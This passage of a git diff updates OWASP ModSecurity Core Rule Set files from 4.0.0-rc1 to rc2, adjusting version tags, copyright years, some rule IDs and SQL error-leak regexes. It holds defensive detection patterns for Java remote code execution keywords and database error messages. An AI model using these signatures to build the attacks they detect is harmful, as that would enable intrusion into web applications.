@@ -1186,7 +1202,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1208,7 +1224,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1228,7 +1244,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
index be39699..04c9be7 100644
--- a/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+++ b/rules/@owasp_crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -24,7 +24,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/21/593/61',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -43,7 +43,7 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/21/593/61',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule REQUEST_HEADERS:Referer "@rx ^(?:ht|f)tps?://(.*?)/" \
@@ -67,7 +67,7 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/21/593/61',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule &REQUEST_HEADERS:Referer "@eq 0" \
diff --git a/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
index ae57ba8..5bcccc5 100644
--- a/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+++ b/rules/@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -25,7 +25,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'capec/1000/152/137/6',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -45,7 +45,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?:unmarshaller|base64data|java\.)" \
@@ -67,7 +67,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \
@@ -89,7 +89,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -108,7 +108,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -127,7 +127,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE
     tag:'capec/1000/152/137/6',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -148,7 +148,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE
     tag:'capec/1000/152/137/6',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -167,7 +167,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -186,7 +186,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -206,7 +206,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -226,7 +226,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -246,7 +246,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -268,7 +268,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -289,7 +289,7 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE
     tag:'capec/1000/152/137/6',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf b/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf
index d069962..6a0ab19 100644
--- a/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf
+++ b/rules/@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -141,7 +141,7 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh
     t:none,\
     msg:'Inbound Anomaly Score Exceeded in phase 1 (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\
     tag:'anomaly-evaluation',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     chain"
     SecRule TX:EARLY_BLOCKING "@eq 1"
 SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \
@@ -151,7 +151,7 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh
     t:none,\
     msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\
     tag:'anomaly-evaluation',\
-    ver:'OWASP_CRS/4.0.0-rc1'"
+    ver:'OWASP_CRS/4.0.0-rc2'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
diff --git a/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf b/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf
index d239bb3..344ab17 100644
--- a/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf
+++ b/rules/@owasp_crs/RESPONSE-950-DATA-LEAKAGES.conf
@@ -1,14 +1,14 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950020,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950021,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
 SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?<H|title>Index of.*?<h)1>Index of|>\[To Parent Directory\]</[Aa]><br>)" \
     "id:950130,\
     phase:4,\
@@ -25,7 +25,7 @@ SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?<H|title>Index of.*?<h)1>Inde
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54/127',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^#\!\s?/" \
@@ -44,7 +44,7 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
@@ -65,11 +65,11 @@ SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950022,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
 SecMarker "END-RESPONSE-950-DATA-LEAKAGES"
diff --git a/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf
index 81eb700..3ce667c 100644
--- a/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf
+++ b/rules/@owasp_crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -21,7 +21,7 @@ SecRule RESPONSE_BODY "!@pmFromFile sql-errors.data" \
     tag:'attack-disclosure',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     skipAfter:END-SQL-ERROR-MATCH-PL1"
 SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \
     "id:951110,\
@@ -38,7 +38,7 @@ SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Micr
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -57,7 +57,7 @@ SecRule RESPONSE_BODY "@rx (?i:ORA-[0-9][0-9][0-9][0-9]|java\.sql\.SQLException|
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -76,7 +76,7 @@ SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]|
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -95,7 +95,7 @@ SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinit
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -114,7 +114,7 @@ SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -133,7 +133,7 @@ SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollba
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -152,7 +152,7 @@ SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -171,7 +171,7 @@ SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statem
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -190,7 +190,7 @@ SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -209,7 +209,7 @@ SecRule RESPONSE_BODY "@rx (?i:<b>Warning</b>: ibase_|Unexpected end of command
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -228,11 +228,11 @@ SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
-SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function .* expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|SQL Server.*Driver|SQL Server.*[0-9a-fA-F]{8}|Exception.*\WSystem\.Data\.SqlClient\.)" \
+SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function .* expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|SQL Server.*Driver|SQL Server.*[0-9a-fA-F]{8}|Exception.*\WSystem\.Data\.SqlClient\.|Conversion failed when converting the varchar value .*? to data type int\.)" \
     "id:951220,\
     phase:4,\
     block,\
@@ -247,11 +247,11 @@ SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsof
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
-SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid |SQL syntax.*)MySQL|Column count doesn't match(?: value count at row)?|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax(?:;| near)|MyS(?:QL server version for the right syntax to use|qlClient\.)|\[MySQL\]\[ODBC|(?:Table '[^']+' doesn't exis|valid MySQL resul)t|Warning.{1,10}mysql_(?:[\(-\)_a-z]{1,26})?|ERROR [0-9]{4} \([0-9a-z]{5}\):" \
+SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid |SQL syntax.*)MySQL|Column count doesn't match(?: value count at row)?|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax(?:;| near)|MyS(?:QL server version for the right syntax to use|qlClient\.)|\[MySQL\]\[ODBC|(?:Table '[^']+' doesn't exis|valid MySQL resul)t|Warning.{1,10}mysql_(?:[\(-\)_a-z]{1,26})?|(?:ERROR [0-9]{4} \([0-9a-z]{5}\)|XPATH syntax error):" \
     "id:951230,\
     phase:4,\
     block,\
@@ -266,11 +266,11 @@ SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid |SQL syntax.*
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
